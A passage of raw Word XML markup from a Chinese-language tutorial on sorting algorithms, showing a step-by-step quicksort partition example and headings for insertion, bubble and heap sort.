          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  90  95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      90 &gt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">90 </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j = 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3 = i    j = 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  15  30  17  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  90  95  </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      56 &gt; 46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不需要交换，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> j = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　　　　　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>      i  =  j = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i = j = 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这样序列就这样分割成了两部分，左边部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{15</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17} </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>均小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准值（</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）；右边部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> {56</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 90</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>82}</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，均大于基准值。这样子我们就达到了分割序列的目标。在接着对子序列用同样的办法进行分割，直至子序列不超过一个元素，那么排序结束，整个序列处于有序状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="007216CF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003746DC" w:rsidRDefault="003746DC" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00676CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC02DC" w:rsidRDefault="00BC02DC" w:rsidP="00BC02DC"/>
    <w:p w:rsidR="00BC02DC" w:rsidRDefault="00BC02DC" w:rsidP="00BC02DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2838484"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="26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97" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2838484"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00141E7E" w:rsidRPr="00BC02DC" w:rsidRDefault="00141E7E" w:rsidP="00BC02DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3073770"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="262"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98" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3073770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00676CC4" w:rsidRDefault="00676CC4" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>冒泡排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0765D" w:rsidRDefault="00B0765D" w:rsidP="00B0765D"/>
    <w:p w:rsidR="00B0765D" w:rsidRPr="00B0765D" w:rsidRDefault="00B0765D" w:rsidP="00B0765D"/>
    <w:p w:rsidR="00CE5FBF" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE5FBF" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00303701">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00424D8E" w:rsidRPr="000508BC" w:rsidRDefault="00303701" w:rsidP="000508BC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="107" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="323" w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000508BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>堆排序是一种算法复杂度为</w:t>
      </w:r>
      <w:r w:rsidRPr="000508BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nlgn</w:t>
      </w:r>
      <w:r w:rsidRPr="000508BC">
        <w:rPr>
